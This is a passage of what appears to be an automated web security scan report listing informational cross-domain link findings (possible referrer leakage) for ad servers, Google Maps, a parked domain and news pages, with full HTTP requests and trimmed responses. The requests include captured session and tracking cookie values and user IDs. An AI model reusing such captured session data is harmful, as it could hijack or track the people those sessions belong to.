Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 3592

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/%253Finline%253Dnyt-classifier%26hl%3Den%26client%3Dca-nytimes_display_html%26adU%3DXactlyCorp.com%26adT%3DImageAd%26gl%3DUS%26hideleadgen%3D1&amp;usg=AFQjCNEN9oqZ9N8fHWQKaoASV4oe55aOlg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.22. http://img.mediaplex.com/content/0/15917/119013/OD_Promises_Domestic_300x250.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/15917/119013/OD_Promises_Domestic_300x250.js

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /content/0/15917/119013/OD_Promises_Domestic_300x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F15917-119013-26745-9%3Fmpt%3D4107592&mpjs=core.insightexpressai.com%2FadServer%2FadServerESI.aspx%3FbannerID%3D175237%26siteID%3D15917119013267459%26creativeID%3D7164347&mpt=4107592&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b05/3/0/%2a/x%3B240687484%3B0-0%3B0%3B22018236%3B4307-300/250%3B41199286/41217073/1%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%7Eokv%3D%3Bcomp%3D%3Bs1%3Dmarkets%3Bs2%3D%3Bpos%3Dframe1%3Bctype%3Dfront%3Bptype%3Darticle%3Burl%3Dmarkets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_%3Bm1%3Drecession%3Bm2%3Dhenry-kravis%3Bm3%3Drjr-nabisco%3Bm4%3Djunk-bonds%3Bm5%3Dpadma-lakshmi%3Brs%3D10428%3Bqc%3DD%3Bqc%3DT%3Bqc%3D3995%3Bqc%3D921%3Bqc%3D922%3Bqc%3D928%3Bqc%3D929%3Bqc%3D3994%3Bsz%3D300x250%2C336x280%3Btile%3D2%3Bu%3D10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||%3B%21c%3D%3B%7Eaopt%3D2/1/9e/0%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=15917:26745/13198:5934/13305:22136/17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:21 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 18:13:03 GMT
ETag: "429679-e60-49f02141c69c0"
Accept-Ranges: bytes
Content-Length: 6772
Content-Type: application/x-javascript


(function(){
var protocol = window.location.protocol;
if (protocol == "https:") {
protocol = "https://secure.img-cdn.mediaplex.com/0/";
}
else
{
protocol = "http://img-cdn.mediaplex.com/0/";
};
...[SNIP]...
Write( mp_html );
else
document.write( mp_html );
} else if( !( navigator.appName && navigator.appName.indexOf("Netscape") >= 0 && navigator.appVersion.indexOf("2.") >= 0 ) ) {
document.write('<a href="http://ad.doubleclick.net/click;h=v8/3b05/3/0/*/x;240687484;0-0;0;22018236;4307-300/250;41199286/41217073/1;u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;~okv=;comp=;s1=markets;s2=;pos=frame1;ctype=front;ptype=article;url=markets_2011_05_03_legendary-deal-maker-ted-forstmann-treated-brain-cancer_;m1=recession;m2=henry-kravis;m3=rjr-nabisco;m4=junk-bonds;m5=padma-lakshmi;rs=10428;qc=D;qc=T;qc=3995;qc=921;qc=922;qc=928;qc=929;qc=3994;sz=300x250,336x280;tile=2;u=10428|||||article|frame1|recession|henry-kravis|rjr-nabisco|junk-bonds|padma-lakshmi|||||||||||||||||||||;!c=;~aopt=2/1/9e/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/15917-119013-26745-9?mpt=4107592" target="_blank"><img src="http://img-cdn.mediaplex.com/0/15917/119013/OD_Promises_Domestic_300x250.jpg" width="300" height="250" border="0" alt="">
...[SNIP]...

19.23. http://maps.google.com/maps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /maps?hl=en&source=hp&q=530+Virginia+Road+P.O.+Box+9133+Concord,+Massachusetts&ie=UTF8&hq=&hnear=530+Virginia+Rd,+Concord,+Middlesex,+Massachusetts+01742&z=14&iwloc=r10&ll=42.476402,-71.298008&output=embed HTTP/1.1
Host: maps.google.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/contact_us/index
Cookie: PREF=ID=a84248b084119e14:U=0e01645f8124d18b:FF=0:TM=1297097718:LM=1297260472:S=nEXcDanFJNlg7e6-; NID=46=Kh16oMYjJ3i3M9ZKS5-Uc5ayK3FUI9_l7bNoXIqZCInKPUiI535abnnz71YLg2JxJAatb0xLnt91XRSe8ggj3yrqv3a9JAg-PawaBwsLEw2CfhkOasVNgrLJ9ixYklzJ

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Date: Thu, 12 May 2011 12:27:52 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Content-Length: 138530

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/smc.png"/> <div class="smcpanup" id="pan_up_inline" jsaction="smc.selectPanUp">
...[SNIP]...
</div> <img class="hide-msie-6 logo" src="http://maps.gstatic.com/mapfiles/poweredby.png"/> </a>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div class="dir-tm" style="visibility:" id="travel_modes_div"> <img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/><a jsfor="travelModes" jsvalues=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsvalues="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...
<div class="icon lsicon" log="" jsaction="app.openInfoWindow" jsprops="markerid:'A'" jstrack="SNLLTaXOGaTqzgWP7533CQ" ved=0CAkQ_gswAA id="marker_A_1"><img alt="A" src="http://maps.gstatic.com/intl/en_us/mapfiles/transparent.png" class="mp iconA"/></div>
...[SNIP]...

19.24. http://pepperhamilton.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pepperhamilton.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA HTTP/1.1
Host: pepperhamilton.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: parkinglot=1

Response

HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Connection: Keep-Alive
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Keep-Alive: timeout=3, max=99
P3P: policyref="http://www.dsnextgen.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1305201705%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Ayzustqxtwswvrsr; path=/; expires=Fri, 13-May-2011 12:01:45 GMT
Set-Cookie: pepperhamilton.com=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1305201705%7Cclick%3A0%7Cblocked%3A0; path=/; expires=Fri, 13-May-2011 12:01:45 GMT
Set-Cookie: Spusr=3c0015ac4dd84dcbcc2919f5; path=/; expires=Sat, 11-May-2013 12:01:45 GMT
Content-Length: 51485

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- turing_cluster_prod -->
<html>
<head> <title> pepperhamilton.com </title>
<meta http-equiv="Keywords"
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<link rel="shortcut icon" href="http://cdn.dsultra.com/favicon/mi_favicon.ico" type="image/x-icon">
<script type="text/javascript">
...[SNIP]...
</script>


<link rel="stylesheet" href="http://cdn.dsultra.com/css/0/landing/en.css" type="text/css">


<link rel="stylesheet" href="http://cdn.dsultra.com/css/785/landing/en.css" type="text/css">

<!-- BOF custom css -->
...[SNIP]...
<span class="footer_privacy_section">
<a href="http://cdn.dsultra.com/t/privacy_ds.htm" target="privacy_pepperhamilton_com">Privacy Policy</a>
...[SNIP]...
</script>

<iframe src='http://domdex.com/f?c=107&k=find lawyers in your area' width=0 height=0 frameborder=0></iframe>
...[SNIP]...
</script> <script type="text/javascript" src="http://p.chango.com/p.js"></script>
...[SNIP]...

19.25. http://pixel.invitemedia.com/admeld_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /admeld_sync?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; dp_rec="{\"1\": 1304954972+ \"3\": 1305125819+ \"2\": 1304949608+ \"5\": 1304954981+ \"4\": 1304954975}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"594286\": [1305035434+ \"2214981f-6ad1-347f-b68c-65cac0743543\"+ 140741+ 69733+ 139]+ \"423816\": [1305035840+ \"562254c9-5bb8-3476-9992-adb6207f4e32\"+ 144852+ 85665+ 227]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"591269\": [1305125830+ \"TcqjuAAEHsEK5XEIPxlByw==\"+ 62899+ 25126+ 8064]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619519\": [1305033320+ \"8188923508912701641\"+ 4451+ 6017+ 1201]+ \"628850\": [1305126069+ \"57c14386-864e-359d-8fb4-c32422e3a406\"+ 11349+ 57595+ 3180]+ \"619680\": 
[1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"619681\": [1305033339+ \"7307077377628671859\"+ 4451+ 6017+ 1201]+ \"50347\": [1305034714+ \"f2cf7655-4055-39ab-b4a3-d0ded4a34a06\"+ 44698+ 62225+ 139]+ \"581293\": [1305035906+ \"99b5fa1e-4f3e-370e-924a-24b5b9838ca0\"+ 140741+ 69733+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"581049\": [1305035636+ \"5de90a2a-d278-31ea-a24a-0c203fa41504\"+ 140741+ 69733+ 227]}"; camp_freq_p1="eJzjkuG48plFgFli68lV71gUGDU+gmgDRgswn0uG4xVY9thxiOy5qxBZMJ9LgmP+YlYBRommzqVg2aZ/J4GyDBYMQJnpH5mBMgc6IDIHPm6By/xdBNLzpQ0i8+U3TI8IR8dGkMyqVpAMgwYDWFSY440zUPDW/yVIgiIcK8+yAp31+wuq6BSgKJPECzTRCx+YgKKPJyxAEf3+DeTA/8/mo4jOvgESfY4meu8AyNwtF369RRZdMR/k3Ml9p1FEd94HmTBr/lqEKADut2xQ"; io_freq_p1="eJzjkuY4HijAJrH15Kp3LAqMGh9BtAGTxbHjQJpLmONNqACjRFPnUqAkgwaDAYMFA1DwqytQ8EAHquATkMovbaiCXeFAwVWtqIIvhYGCt/4vQRG8GiHALPH7C6rgmkgBJokXaIK7rYGCjycsQBFc4AIU/P9sPorgeleg4JYLv94iC24DuXNy32kUwb0uQMFZ89ciBAEFMUmn"; segments_p1="eJwdUM1KAlEYZe6dxeWu5iF6g14jAnVRD+GuJ+gHG7GghIygoB5AcCBEGx0rLDMzFVoFRcH0n2OrciFO59zN4Xw/55zvXi1VIalttdaVWqrDFOAijdpdl1qrWiCdz1ovstHJvwjgWc4ChoGF6aQsHP/t1UxboYB0ugC6BamtfjvE/TFF0Sn5pEXMugxqK9CDMTXbM7CqIujhvgkroTi6CqmrHlEx2GSkW+Hy8iLgNg3o8MrKCUcrGWJ9ROxiWardWdCvY3q8+8yLEgBvCfXQp2fb3JUfUrJnzvAYuxqzfelREs/R2jTiG2qevmn9kwD9CNjeMA+99vlT5aJwSs/BiH8R9mnb2+G0/8fN8yYj3CSglEKdy9BqysjHLMMa83xonVt3pMWG9Q/+LG7L"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 12 May 2011 11:39:27 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Thu, 12-May-2011 11:39:07 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 737

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=8218888f-9a83-4760-bd14-33b4666730c0&Expiration=1305632367&custom_user_segments=%2C11265%2C17154%2C49027%2C59012%2C50056%2C50185%2C17163%2C50060%2C49026%2C50064%2C4625%2C45714%2C10478%2C10518%2C6551%2C48153%2C48156%2C48157%2C10656%2C14769%2C24493%2C10672%2C8%2C38582%2C48201%2C23864%2C57145%2C57148%2C30653%2C10504%2C10047%2C17857%2C41538%2C13893%2C55494%2C45639%2C45640%2C1097%2C56778%2C13899%2C30354%2C18125%2C13902%2C51919%2C48080%2C18129%2C10068%2C39944%2C53433%2C26724%2C50398%2C30304%2C24420%2C1073%2C40657%2C56808%2C58364%2C39531%2C56813%2C57454%2C10480%2C1150%2C58870%2C40809%2C59007%2C39804%2C11262%2C9855"/>');

19.26. http://privatemoneytalk.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://privatemoneytalk.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?utm_source=msn&utm_medium=cpc&utm_term=private%20equity HTTP/1.1
Host: privatemoneytalk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:34 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://privatemoneytalk.com/xmlrpc.php
Set-Cookie: PHPSESSID=35655162a024a2c7b1ebfebb9b6b03b6; path=/
Set-Cookie: sbmg_footerShowAfter=1; expires=Fri, 11-May-2012 11:02:35 GMT; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 22087

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en-US">
<head>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
...[SNIP]...
<!-- Begin Catalyst Footer Scripts -->
<script type="text/javascript" src="http://infusionextreme.com/tracker/js/t8ea1977da8b0f1a343c918eec0a87bfb.js"></script>
...[SNIP]...

19.27. http://securelab.digiware.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://securelab.digiware.net
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?cat=8 HTTP/1.1
Host: securelab.digiware.net
Proxy-Connection: keep-alive
Referer: http://securelab.digiware.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 14:27:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
X-Pingback: http://securelab.digiware.net/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 11892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<he
...[SNIP]...
</a>
               <a href="http://twitter.com/securelab" target="_blank" class="buttonfixed" title="Follow me" style="top:40px;">
                   <div class="twit1">
...[SNIP]...
<li class="recentcomments"><a href='http://ezinearticles.com/?Panic-Attack---Causes,-Symptoms-and-Cures&amp;id=3873312' rel='external nofollow' class='url'>Panic Attack</a>
...[SNIP]...
<li><a href="http://www.condorlabs.net" title="Secured VoIP">CondorLabs</a>
...[SNIP]...
</a>. Sweet icons by <a href="http://famfamfam.com/">famfamfam</a>
...[SNIP]...
<div id="footerright">
<a href="http://wordpress.org" title="WordPress platform" ><img src="http://securelab.digiware.net/wp-content/themes/pixel/images/wpfooter-trans.png" alt="WordPress" width="34" height="34" />
...[SNIP]...

19.28. http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxbusiness/300x250/ros

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9; D41U=3ZP6aPgJzYQImYO2fkBZoKF-nc31zVj-pLzxjzthWC1M8tPub3s1d8g; __qca=P0-71277472-1304957857861

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2698
Content-Type: text/html
Date: Thu, 12 May 2011 11:39:09 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:300px;height:250px;margin:0;border:0">


<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N5271.contextweb.com/B5456322.7;sz=300x250;click=http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~533594~3136~56301~119820~96152~3~145~9~foxbusiness.com~2~8~1~0~4~3~c_yq_b9rRGtSPwX3P_m_Gx-BuGORiE-1N_p50BIUKzk^~49~2~r2lmvJHLrhjp~wOebwAz4UvVv~1~1~1~~;ord=2131773229?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://cdslog.contextweb.com/CDSLogger/L.aspx?q=C~533594~3136~56301~119820~96152~3~145~9~foxbusiness.com~2~8~1~0~4~3~c_yq_b9rRGtSPwX3P_m_Gx-BuGORiE-1N_p50BIUKzk^~49~2~r2lmvJHLrhjp~wOebwAz4UvVv~1~1~1~~http://ad.doubleclick.net/jump/N5271.contextweb.com/B5456322.7;sz=300x250;ord=2131773229?">
<IMG SRC="http://ad.doubleclick.net/ad/N5271.contextweb.com/B5456322.7;sz=300x250;ord=2131773229?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
</NOSCRIPT>

<img src="http://bh.contextweb.com/bh/it?i=r2lmvJHLrhjp&p=533594&ct=96152&ad=56301&cc=119820&dm=foxbusiness.com&bp=4.00&wp=4.00&rnd=tZWZ0W5q5Qtk" height="1" width="1"/>

<img src="http://bh.contextweb.com/bh/drts?drts=true&ck=FC1-WC%40%255E56301_1_2Ui1T%40.contextweb.com%40989591948%40%252F%7CCDSActionTracking6%40r2lmvJHLrhjp%257CwOebwAz4UvVv%257C533594%257C3136%257C6449%257C56301%257C119820%257C96152%257C3%257C145%257C9%257Cfoxbusiness.com%257C2%257C8%257C1%257C0%257C4%257C3%257C2%257CLIFL1.FCRT1.ZETC1.AMQU2.NETM7.EXPD1.FACO1%257C1%257C1%257Cc_yq_b9rRGtSPwX3P_m_Gx-BuGORiE-1N_p50BIUKzk%255E%257CI%257C2TVyl%257C34NQN%40.contextweb.com%4045412748%40%252F&rnd=v0CzR1ayL7u8" height="1" width="1"/>


</div>
...[SNIP]...
<div style="width:0;height:0">


<img src="http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif?labels=3%2e4%2e5%2e300x250&media=apl&idmatch=0" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>

<iframe width="0" height="0" border="0" marginwidth="0" marginheight="0" frameborder="0" src="http://w55c.net/ct/cms-2-frame.html?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=260&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match"></iframe>

<script type="text/javascript" src="http://admeld.lucidmedia.com/clicksense/admeld/match?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>
...[SNIP]...

19.29. http://topics.nytimes.com/topics/reference/timestopics/subjects/p/private_equity/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /topics/reference/timestopics/subjects/p/private_equity/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /topics/reference/timestopics/subjects/p/private_equity/index.html?inline=nyt-classifier HTTP/1.1
Host: topics.nytimes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
